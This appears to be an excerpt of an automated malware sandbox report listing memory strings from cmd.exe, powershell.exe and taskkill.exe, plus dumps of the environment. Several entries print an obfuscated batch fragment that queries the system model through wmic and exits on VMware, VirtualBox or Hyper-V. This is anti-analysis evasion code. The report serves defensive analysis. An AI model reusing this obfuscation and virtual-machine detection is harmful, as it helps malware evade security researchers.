Source: taskkill.exe, 00000048.00000002.1751235517.0000018389DA9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \nif "%pRRskkyxH%TxdoRBmbqzyDVqyq%PgoZqotPpEsJcYkgv%oIMCIYPcwKpRXwK%hZOpTayxjdmkYSTjwD%isoMMZLfuBkSCvSyyG%qCQhJEFampksrwfrH%CijJlvWCTruCJCKdl%fqmJILLziDUrkvnqn%kmYFUdkjVrRsAkRgE%ObkWUkGgYulxXHBAg%oRwulXKHtPlwIBGZgl%urTGZNVgFfZlhAgG%CRTkCOGlG%"=="Microsoft Corporation" if "%qZeNCZQ%wmXNiBYbPdfGrqJTw%zryaeCiiDdiFTXMmAh%QVIQwReasfWDTDlvM%AgRBROmTOtYYoineiSN%dYnsVHrFmacxxSXvQ%tWLEIVCk%"=="Virtual Machine" exit\nif "%xRBQinlJp%mbrgPxxAzbmdwePzaaH%MmGCkpHprbHzNBCL%mfpYqPqngcewVYgCrL%YPqZvLxjPlulEQkM%foIJfWFnRubkbHmJkS%pScwvjKLppAAsqLazCm%nslqyZxurJOtEixMMO%MbqOKcliRtUghUY%AWjPTCANrjVNHgbGQ%zMexKLWbgIYRTWUrvB%nXCkplftFHEScSuGg%SQDhLiegIuuTSdV%FhVxegw%"=="VMware, Inc." exit\nif "%OsDKwVzNU%SVsXrnjRzbMMdThZlMy%zOYvoUadunZYwHaL%rBEfReLkosoYRBCab%rOfxBNztkqwXodCsi%dDBvtrKaarMepAQw%xEkHLwXz%"=="VirtualBox" exit m
Source: cmd.exe, 0000000B.00000003.1438421646.000002C1DCA50000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \nif "%rSidEOFKb%RBQBVavYbHFNCHgULy%FZEZytkVUlPfSsjdd%PAGAviKZcRctOmhcN%nRPaeLgijflMFxiH%yrudAalWkWaWBRM%HuojAUNODxLvYras%qaZIQYrUKapfffJCj%OLycHAPPizmhfUWq%DjddDOjzQjwlAyiAa%SalgYZpOvgiIrxBKqac%NyzftuFmaZMdAYn%HFggyaTYugcuTwIMp%XxLpJzAgj%"=="Microsoft Corporation" if "%dyGekKzIq%QGCXmIYbRaPKVljWS%SFjxtsIZTdfbTIVMFZY%hhaoSTIVKKgIdqLOfR%tBlMcjzxiQoJazG%sUpijttaaKGTcrU%IcTTvOpz%"=="Virtual Machine" exit\nif "%RSwzNHyfa%zyZfUdAybVIWrwPC%WuJxFnGQeUHwquaK%rJJznxsecvtrBggY%sQniHhlrjEdYkDHq%bUrtDWRVSfMmQWnlaC%jDyXKhYvmKGaVRsV%bqxxsgmTPIwbZiG%ZdgWwSBigLMfnjTJz%mfJNznTXjMBsoiXJOg%BMlukJdggCBYuGA%GFVaLptyHQlxIpaE%BalxeNxgsZiGoJAY%OzHutdjL%"=="VMware, Inc." exit\nif "%OxkSRwDO%DIQVAFRbxNeclWRg%WzUEpvndKgDYYXNPS%JONgxjdzkMdxvrWz%vXgVousbjMwnsRf%bqSDzdLgkajxGVrSba%uTenQde%"=="VirtualBox" exit n=cN1=CNUMBER_OF_PROCESSORS=2o=dO1=DOneDrive=C:\Users\user\OneDriveOS=Windows_NTp=eP1=EPath=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPLPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPROMPT=$P$GPSExecutionPolicyPreference=BypassPSModulePath=C:\Users\user\Documents\WindowsPowerShell\Modules;C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\Publicq=fQ1=Fr=gR1=Gs=hS1=HSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\Windowst=iT1=ITEMP=C:\Users\user~1\AppData\Local\TempTMP=C:\Users\user~1\AppData\Local\Tempu=jU1=JUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userv=kV1=Kw=lW1=Lwindir=C:\Windowsx=mX1=My=nY1=Nz=oZ1=OPP
Source: cmd.exe, 0000000B.00000003.1421119512.000002C1DCA59000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \nif "%rSidEOFKb%RBQBVavYbHFNCHgULy%FZEZytkVUlPfSsjdd%PAGAviKZcRctOmhcN%nRPaeLgijflMFxiH%yrudAalWkWaWBRM%HuojAUNODxLvYras%qaZIQYrUKapfffJCj%OLycHAPPizmhfUWq%DjddDOjzQjwlAyiAa%SalgYZpOvgiIrxBKqac%NyzftuFmaZMdAYn%HFggyaTYugcuTwIMp%XxLpJzAgj%"=="Microsoft Corporation" if "%dyGekKzIq%QGCXmIYbRaPKVljWS%SFjxtsIZTdfbTIVMFZY%hhaoSTIVKKgIdqLOfR%tBlMcjzxiQoJazG%sUpijttaaKGTcrU%IcTTvOpz%"=="Virtual Machine" exit\nif "%RSwzNHyfa%zyZfUdAybVIWrwPC%WuJxFnGQeUHwquaK%rJJznxsecvtrBggY%sQniHhlrjEdYkDHq%bUrtDWRVSfMmQWnlaC%jDyXKhYvmKGaVRsV%bqxxsgmTPIwbZiG%ZdgWwSBigLMfnjTJz%mfJNznTXjMBsoiXJOg%BMlukJdggCBYuGA%GFVaLptyHQlxIpaE%BalxeNxgsZiGoJAY%OzHutdjL%"=="VMware, Inc." exit\nif "%OxkSRwDO%DIQVAFRbxNeclWRg%WzUEpvndKgDYYXNPS%JONgxjdzkMdxvrWz%vXgVousbjMwnsRf%bqSDzdLgkajxGVrSba%uTenQde%"=="VirtualBox" exit n=cNUMBER_OF_PROCESSORS=2o=dOneDrive=C:\Users\user\OneDriveOS=Windows_NTp=ePath=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPLPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPROMPT=$P$GPSExecutionPolicyPreference=BypassPSModulePath=C:\Users\user\Documents\WindowsPowerShell\Modules;C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\Publicq=fr=gs=hSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\Windowst=iTEMP=C:\Users\user~1\AppData\Local\TempTMP=C:\Users\user~1\AppData\Local\Tempu=jUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userv=kw=lwindir=C:\Windowsx=my=nz=oSC;.C
Source: cmd.exe, 0000000B.00000003.1417333367.000002C1DCA50000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \nif "%rSidEOFKb%RBQBVavYbHFNCHgULy%FZEZytkVUlPfSsjdd%PAGAviKZcRctOmhcN%nRPaeLgijflMFxiH%yrudAalWkWaWBRM%HuojAUNODxLvYras%qaZIQYrUKapfffJCj%OLycHAPPizmhfUWq%DjddDOjzQjwlAyiAa%SalgYZpOvgiIrxBKqac%NyzftuFmaZMdAYn%HFggyaTYugcuTwIMp%XxLpJzAgj%"=="Microsoft Corporation" if "%dyGekKzIq%QGCXmIYbRaPKVljWS%SFjxtsIZTdfbTIVMFZY%hhaoSTIVKKgIdqLOfR%tBlMcjzxiQoJazG%sUpijttaaKGTcrU%IcTTvOpz%"=="Virtual Machine" exit\nif "%RSwzNHyfa%zyZfUdAybVIWrwPC%WuJxFnGQeUHwquaK%rJJznxsecvtrBggY%sQniHhlrjEdYkDHq%bUrtDWRVSfMmQWnlaC%jDyXKhYvmKGaVRsV%bqxxsgmTPIwbZiG%ZdgWwSBigLMfnjTJz%mfJNznTXjMBsoiXJOg%BMlukJdggCBYuGA%GFVaLptyHQlxIpaE%BalxeNxgsZiGoJAY%OzHutdjL%"=="VMware, Inc." exit\nif "%OxkSRwDO%DIQVAFRbxNeclWRg%WzUEpvndKgDYYXNPS%JONgxjdzkMdxvrWz%vXgVousbjMwnsRf%bqSDzdLgkajxGVrSba%uTenQde%"=="VirtualBox" exit n=cNUMBER_OF_PROCESSORS=2o=dOneDrive=C:\Users\user\OneDriveOS=Windows_NTp=ePath=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPLPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPROMPT=$P$GPSExecutionPolicyPreference=BypassPSModulePath=C:\Users\user\Documents\WindowsPowerShell\Modules;C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\Publicq=fr=gs=hSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\Windowst=iTEMP=C:\Users\user~1\AppData\Local\TempTMP=C:\Users\user~1\AppData\Local\Tempu=jUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userv=kw=lwindir=C:\Windowsx=my=nz=o^^
Source: cmd.exe, 0000000B.00000003.1422079685.000002C1DCA50000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \nif "%rSidEOFKb%RBQBVavYbHFNCHgULy%FZEZytkVUlPfSsjdd%PAGAviKZcRctOmhcN%nRPaeLgijflMFxiH%yrudAalWkWaWBRM%HuojAUNODxLvYras%qaZIQYrUKapfffJCj%OLycHAPPizmhfUWq%DjddDOjzQjwlAyiAa%SalgYZpOvgiIrxBKqac%NyzftuFmaZMdAYn%HFggyaTYugcuTwIMp%XxLpJzAgj%"=="Microsoft Corporation" if "%dyGekKzIq%QGCXmIYbRaPKVljWS%SFjxtsIZTdfbTIVMFZY%hhaoSTIVKKgIdqLOfR%tBlMcjzxiQoJazG%sUpijttaaKGTcrU%IcTTvOpz%"=="Virtual Machine" exit\nif "%RSwzNHyfa%zyZfUdAybVIWrwPC%WuJxFnGQeUHwquaK%rJJznxsecvtrBggY%sQniHhlrjEdYkDHq%bUrtDWRVSfMmQWnlaC%jDyXKhYvmKGaVRsV%bqxxsgmTPIwbZiG%ZdgWwSBigLMfnjTJz%mfJNznTXjMBsoiXJOg%BMlukJdggCBYuGA%GFVaLptyHQlxIpaE%BalxeNxgsZiGoJAY%OzHutdjL%"=="VMware, Inc." exit\nif "%OxkSRwDO%DIQVAFRbxNeclWRg%WzUEpvndKgDYYXNPS%JONgxjdzkMdxvrWz%vXgVousbjMwnsRf%bqSDzdLgkajxGVrSba%uTenQde%"=="VirtualBox" exit n=cN1=CNUMBER_OF_PROCESSORS=2o=dO1=DOneDrive=C:\Users\user\OneDriveOS=Windows_NTp=ePath=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPLPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPROMPT=$P$GPSExecutionPolicyPreference=BypassPSModulePath=C:\Users\user\Documents\WindowsPowerShell\Modules;C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\Publicq=fr=gs=hSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\Windowst=iTEMP=C:\Users\user~1\AppData\Local\TempTMP=C:\Users\user~1\AppData\Local\Tempu=jUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userv=kw=lwindir=C:\Windowsx=my=nz=o}
Source: powershell.exe, 00000029.00000002.1870747846.000000C00009B000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: \nif "%pRRskkyxH%TxdoRBmbqzyDVqyq%PgoZqotPpEsJcYkgv%oIMCIYPcwKpRXwK%hZOpTayxjdmkYSTjwD%isoMMZLfuBkSCvSyyG%qCQhJEFampksrwfrH%CijJlvWCTruCJCKdl%fqmJILLziDUrkvnqn%kmYFUdkjVrRsAkRgE%ObkWUkGgYulxXHBAg%oRwulXKHtPlwIBGZgl%urTGZNVgFfZlhAgG%CRTkCOGlG%"=="Microsoft Corporation" if "%qZeNCZQ%wmXNiBYbPdfGrqJTw%zryaeCiiDdiFTXMmAh%QVIQwReasfWDTDlvM%AgRBROmTOtYYoineiSN%dYnsVHrFmacxxSXvQ%tWLEIVCk%"=="Virtual Machine" exit\nif "%xRBQinlJp%mbrgPxxAzbmdwePzaaH%MmGCkpHprbHzNBCL%mfpYqPqngcewVYgCrL%YPqZvLxjPlulEQkM%foIJfWFnRubkbHmJkS%pScwvjKLppAAsqLazCm%nslqyZxurJOtEixMMO%MbqOKcliRtUghUY%AWjPTCANrjVNHgbGQ%zMexKLWbgIYRTWUrvB%nXCkplftFHEScSuGg%SQDhLiegIuuTSdV%FhVxegw%"=="VMware, Inc." exit\nif "%OsDKwVzNU%SVsXrnjRzbMMdThZlMy%zOYvoUadunZYwHaL%rBEfReLkosoYRBCab%rOfxBNztkqwXodCsi%dDBvtrKaarMepAQw%xEkHLwXz%"=="VirtualBox" exit UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU`\
Source: cmd.exe, 0000000B.00000003.1417527952.000002C1DCA50000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \nif "%rSidEOFKb%RBQBVavYbHFNCHgULy%FZEZytkVUlPfSsjdd%PAGAviKZcRctOmhcN%nRPaeLgijflMFxiH%yrudAalWkWaWBRM%HuojAUNODxLvYras%qaZIQYrUKapfffJCj%OLycHAPPizmhfUWq%DjddDOjzQjwlAyiAa%SalgYZpOvgiIrxBKqac%NyzftuFmaZMdAYn%HFggyaTYugcuTwIMp%XxLpJzAgj%"=="Microsoft Corporation" if "%dyGekKzIq%QGCXmIYbRaPKVljWS%SFjxtsIZTdfbTIVMFZY%hhaoSTIVKKgIdqLOfR%tBlMcjzxiQoJazG%sUpijttaaKGTcrU%IcTTvOpz%"=="Virtual Machine" exit\nif "%RSwzNHyfa%zyZfUdAybVIWrwPC%WuJxFnGQeUHwquaK%rJJznxsecvtrBggY%sQniHhlrjEdYkDHq%bUrtDWRVSfMmQWnlaC%jDyXKhYvmKGaVRsV%bqxxsgmTPIwbZiG%ZdgWwSBigLMfnjTJz%mfJNznTXjMBsoiXJOg%BMlukJdggCBYuGA%GFVaLptyHQlxIpaE%BalxeNxgsZiGoJAY%OzHutdjL%"=="VMware, Inc." exit\nif "%OxkSRwDO%DIQVAFRbxNeclWRg%WzUEpvndKgDYYXNPS%JONgxjdzkMdxvrWz%vXgVousbjMwnsRf%bqSDzdLgkajxGVrSba%uTenQde%"=="VirtualBox" exit n=cNUMBER_OF_PROCESSORS=2o=dOneDrive=C:\Users\user\OneDriveOS=Windows_NTp=ePath=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPLPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPROMPT=$P$GPSExecutionPolicyPreference=BypassPSModulePath=C:\Users\user\Documents\WindowsPowerShell\Modules;C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\Publicq=fr=gs=hSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\Windowst=iTEMP=C:\Users\user~1\AppData\Local\TempTMP=C:\Users\user~1\AppData\Local\Tempu=jUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userv=kw=lwindir=C:\Windowsx=my=nz=ox
Source: cmd.exe, 0000000B.00000003.1408115597.000002C1DCA50000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: manufacturer=%RhodmbvPs%OfNWzLLk%a\nfor /f "tokens=2 delims==" %a in ('wmic computersystem get model /value') do set model=%VmlZylUz%tdrUBDToo%a\nif "%rSidEOFKb%RBQBVavYbHFNCHgULy%FZEZytkVUlPfSsjdd%PAGAviKZcRctOmhcN%nRPaeLgijflMFxiH%yrudAalWkWaWBRM%HuojAUNODxLvYras%qaZIQYrUKapfffJCj%OLycHAPPizmhfUWq%DjddDOjzQjwlAyiAa%SalgYZpOvgiIrxBKqac%NyzftuFmaZMdAYn%HFggyaTYugcuTwIMp%XxLpJzAgj%"=="Microsoft Corporation" if "%dyGekKzIq%QGCXmIYbRaPKVljWS%SFjxtsIZTdfbTIVMFZY%hhaoSTIVKKgIdqLOfR%tBlMcjzxiQoJazG%sUpijttaaKGTcrU%IcTTvOpz%"=="Virtual Machine" exit\nif "%RSwzNHyfa%zyZfUdAybVIWrwPC%WuJxFnGQeUHwquaK%rJJznxsecvtrBggY%sQniHhlrjEdYkDHq%bUrtDWRVSfMmQWnlaC%jDyXKhYvmKGaVRsV%bqxxsgmTPIwbZiG%ZdgWwSBigLMfnjTJz%mfJNznTXjMBsoiXJOg%BMlukJdggCBYuGA%GFVaLptyHQlxIpaE%BalxeNxgsZiGoJAY%OzHutdjL%"=="VMware, Inc." exit\nif "%OxkSRwDO%DIQVAFRbxNeclWRg%WzUEpvndKgDYYXNPS%JONgxjdzkMdxvrWz%vXgVousbjMwnsRf%bqSDzdLgkajxGVrSba%uTenQde%"=="VirtualBox" exit dd
Source: cmd.exe, 0000000B.00000003.1416160375.000002C1DCA50000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \nif "%rSidEOFKb%RBQBVavYbHFNCHgULy%FZEZytkVUlPfSsjdd%PAGAviKZcRctOmhcN%nRPaeLgijflMFxiH%yrudAalWkWaWBRM%HuojAUNODxLvYras%qaZIQYrUKapfffJCj%OLycHAPPizmhfUWq%DjddDOjzQjwlAyiAa%SalgYZpOvgiIrxBKqac%NyzftuFmaZMdAYn%HFggyaTYugcuTwIMp%XxLpJzAgj%"=="Microsoft Corporation" if "%dyGekKzIq%QGCXmIYbRaPKVljWS%SFjxtsIZTdfbTIVMFZY%hhaoSTIVKKgIdqLOfR%tBlMcjzxiQoJazG%sUpijttaaKGTcrU%IcTTvOpz%"=="Virtual Machine" exit\nif "%RSwzNHyfa%zyZfUdAybVIWrwPC%WuJxFnGQeUHwquaK%rJJznxsecvtrBggY%sQniHhlrjEdYkDHq%bUrtDWRVSfMmQWnlaC%jDyXKhYvmKGaVRsV%bqxxsgmTPIwbZiG%ZdgWwSBigLMfnjTJz%mfJNznTXjMBsoiXJOg%BMlukJdggCBYuGA%GFVaLptyHQlxIpaE%BalxeNxgsZiGoJAY%OzHutdjL%"=="VMware, Inc." exit\nif "%OxkSRwDO%DIQVAFRbxNeclWRg%WzUEpvndKgDYYXNPS%JONgxjdzkMdxvrWz%vXgVousbjMwnsRf%bqSDzdLgkajxGVrSba%uTenQde%"=="VirtualBox" exit n=cNUMBER_OF_PROCESSORS=2o=dOneDrive=C:\Users\user\OneDriveOS=Windows_NTp=ePath=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPLPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPROMPT=$P$GPSExecutionPolicyPreference=BypassPSModulePath=C:\Users\user\Documents\WindowsPowerShell\Modules;C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\Publicq=fr=gs=hSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\Windowst=iTEMP=C:\Users\user~1\AppData\Local\TempTMP=C:\Users\user~1\AppData\Local\Tempu=jUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userv=kw=lwindir=C:\Windowsx=my=nz=ov
Source: cmd.exe, 0000000B.00000003.1416890437.000002C1DCA50000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \nif "%rSidEOFKb%RBQBVavYbHFNCHgULy%FZEZytkVUlPfSsjdd%PAGAviKZcRctOmhcN%nRPaeLgijflMFxiH%yrudAalWkWaWBRM%HuojAUNODxLvYras%qaZIQYrUKapfffJCj%OLycHAPPizmhfUWq%DjddDOjzQjwlAyiAa%SalgYZpOvgiIrxBKqac%NyzftuFmaZMdAYn%HFggyaTYugcuTwIMp%XxLpJzAgj%"=="Microsoft Corporation" if "%dyGekKzIq%QGCXmIYbRaPKVljWS%SFjxtsIZTdfbTIVMFZY%hhaoSTIVKKgIdqLOfR%tBlMcjzxiQoJazG%sUpijttaaKGTcrU%IcTTvOpz%"=="Virtual Machine" exit\nif "%RSwzNHyfa%zyZfUdAybVIWrwPC%WuJxFnGQeUHwquaK%rJJznxsecvtrBggY%sQniHhlrjEdYkDHq%bUrtDWRVSfMmQWnlaC%jDyXKhYvmKGaVRsV%bqxxsgmTPIwbZiG%ZdgWwSBigLMfnjTJz%mfJNznTXjMBsoiXJOg%BMlukJdggCBYuGA%GFVaLptyHQlxIpaE%BalxeNxgsZiGoJAY%OzHutdjL%"=="VMware, Inc." exit\nif "%OxkSRwDO%DIQVAFRbxNeclWRg%WzUEpvndKgDYYXNPS%JONgxjdzkMdxvrWz%vXgVousbjMwnsRf%bqSDzdLgkajxGVrSba%uTenQde%"=="VirtualBox" exit n=cNUMBER_OF_PROCESSORS=2o=dOneDrive=C:\Users\user\OneDriveOS=Windows_NTp=ePath=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPLPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPROMPT=$P$GPSExecutionPolicyPreference=BypassPSModulePath=C:\Users\user\Documents\WindowsPowerShell\Modules;C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\Publicq=fr=gs=hSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\Windowst=iTEMP=C:\Users\user~1\AppData\Local\TempTMP=C:\Users\user~1\AppData\Local\Tempu=jUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userv=kw=lwindir=C:\Windowsx=my=nz=ot
Source: cmd.exe, 0000000B.00000003.1424380118.000002C1DCA5D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \nif "%rSidEOFKb%RBQBVavYbHFNCHgULy%FZEZytkVUlPfSsjdd%PAGAviKZcRctOmhcN%nRPaeLgijflMFxiH%yrudAalWkWaWBRM%HuojAUNODxLvYras%qaZIQYrUKapfffJCj%OLycHAPPizmhfUWq%DjddDOjzQjwlAyiAa%SalgYZpOvgiIrxBKqac%NyzftuFmaZMdAYn%HFggyaTYugcuTwIMp%XxLpJzAgj%"=="Microsoft Corporation" if "%dyGekKzIq%QGCXmIYbRaPKVljWS%SFjxtsIZTdfbTIVMFZY%hhaoSTIVKKgIdqLOfR%tBlMcjzxiQoJazG%sUpijttaaKGTcrU%IcTTvOpz%"=="Virtual Machine" exit\nif "%RSwzNHyfa%zyZfUdAybVIWrwPC%WuJxFnGQeUHwquaK%rJJznxsecvtrBggY%sQniHhlrjEdYkDHq%bUrtDWRVSfMmQWnlaC%jDyXKhYvmKGaVRsV%bqxxsgmTPIwbZiG%ZdgWwSBigLMfnjTJz%mfJNznTXjMBsoiXJOg%BMlukJdggCBYuGA%GFVaLptyHQlxIpaE%BalxeNxgsZiGoJAY%OzHutdjL%"=="VMware, Inc." exit\nif "%OxkSRwDO%DIQVAFRbxNeclWRg%WzUEpvndKgDYYXNPS%JONgxjdzkMdxvrWz%vXgVousbjMwnsRf%bqSDzdLgkajxGVrSba%uTenQde%"=="VirtualBox" exit n=cN1=CNUMBER_OF_PROCESSORS=2o=dO1=DOneDrive=C:\Users\user\OneDriveOS=Windows_NTp=eP1=EPath=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPLPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPROMPT=$P$GPSExecutionPolicyPreference=BypassPSModulePath=C:\Users\user\Documents\WindowsPowerShell\Modules;C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\Publicq=fQ1=Fr=gs=hSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\Windowst=iTEMP=C:\Users\user~1\AppData\Local\TempTMP=C:\Users\user~1\AppData\Local\Tempu=jUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userv=kw=lwindir=C:\Windowsx=my=nz=o&&
